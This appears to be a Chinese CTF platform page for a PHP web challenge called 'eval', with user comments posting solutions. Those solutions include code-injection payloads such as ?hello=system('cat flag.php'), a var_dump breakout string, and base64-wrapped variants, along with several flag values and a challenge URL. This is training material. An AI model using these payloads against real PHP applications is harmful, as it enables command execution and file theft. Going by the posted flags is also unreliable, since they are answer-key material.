evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 13935
提  示:
描  述:
eval
评论
Lsec 1年前

1:?hello=file('flag.php') 2:?hello=);highlight_file('flag.php');var_dump( 3:?hello=eval(system('cat flag.php | base64'))

回复 1

你呀你ii 1年前

?hello=eval(system('cat flag.php | base64'))

回复 4
baianquanzu 1年前

?hello=system('sort flag.php')

回复 0

xlxlxl 1年前

?hello=system('cat flag.php')

回复 1

凉情梦回 1年前

?hello=system('cat flag.php')

回复 3

liu666 1年前

flag{930e51a7a500775093c95aae8b67e404}

回复 3

userdong 1年前

?hello=system('cat flag.php')

回复 3

riacky 1年前

?hello=system('cat flag*')

回复 3

hhthht 1年前

flag{cea9de710e2926a7c49f12318caf3912}

回复 0

ryan777 1年前

根据题中出现的include函数,怀疑存在文件包含漏洞,后面再看题目的eval函数得知存在代码执行的漏洞,可以结合二者,将flag.php的信息获取传递给参数a的值进行代码执行输出flag。即?hello=file('flag.php')

回复 2

AmazingForself 1年前

看网站中出示的码可以看出是php文件包含题故按文件包含程序去做在URL栏输入?hello=file('flag.php')即可完成解答,详细有关文件包含可以参考:https://blog.csdn.net/qq_42181428/article/details/87090539

回复 0

ryl123569 1年前

?hello=file('flag,php') flag{a16626d75937389051135500053bcd36}

回复 0

xiaobaiermei 1年前

这里应该算的上是个文件包含吧

回复 0

17leaf 1年前

flag{4ccf17345bf8d8b3c5a6d005cf17e00a}

回复 0

cap 1年前

为啥我这样不行 ?hello=system("cat flag.php")

回复 0
Restwlaq 1年前

因为cat查看php的源码,经过var_dump还是字符串形式的代码,php中这样的代码还是被解析了,所以就看不到了。所以必须base64转一下,防止被执行。 ?hello=system(’cat flag.php | base64')

回复 0

你的宝 1年前

http://114.67.175.224:15626/?hello=file(%27flag.php%27)

回复 0

WriteUp

image
harry

1 金币

评分(9)

解题动态

xinkuang 攻破了该题 9小时前
yzx666 攻破了该题 13小时前
Barium 攻破了该题 13小时前
15762905283 攻破了该题 14小时前
pb9231 攻破了该题 18小时前
洁念lb 攻破了该题 1天前
suny 攻破了该题 1天前
1214337223 攻破了该题 1天前
Yb9msxx 攻破了该题 1天前
DJCARL 攻破了该题 1天前
wzh98 攻破了该题 1天前
Asamllcoder 攻破了该题 1天前
wzy666 攻破了该题 1天前
regal 攻破了该题 1天前
kirds 攻破了该题 1天前
1075549762 攻破了该题 1天前
Graito 攻破了该题 2天前
huanying1247 攻破了该题 2天前
redsuke 攻破了该题 2天前
941853820 攻破了该题 2天前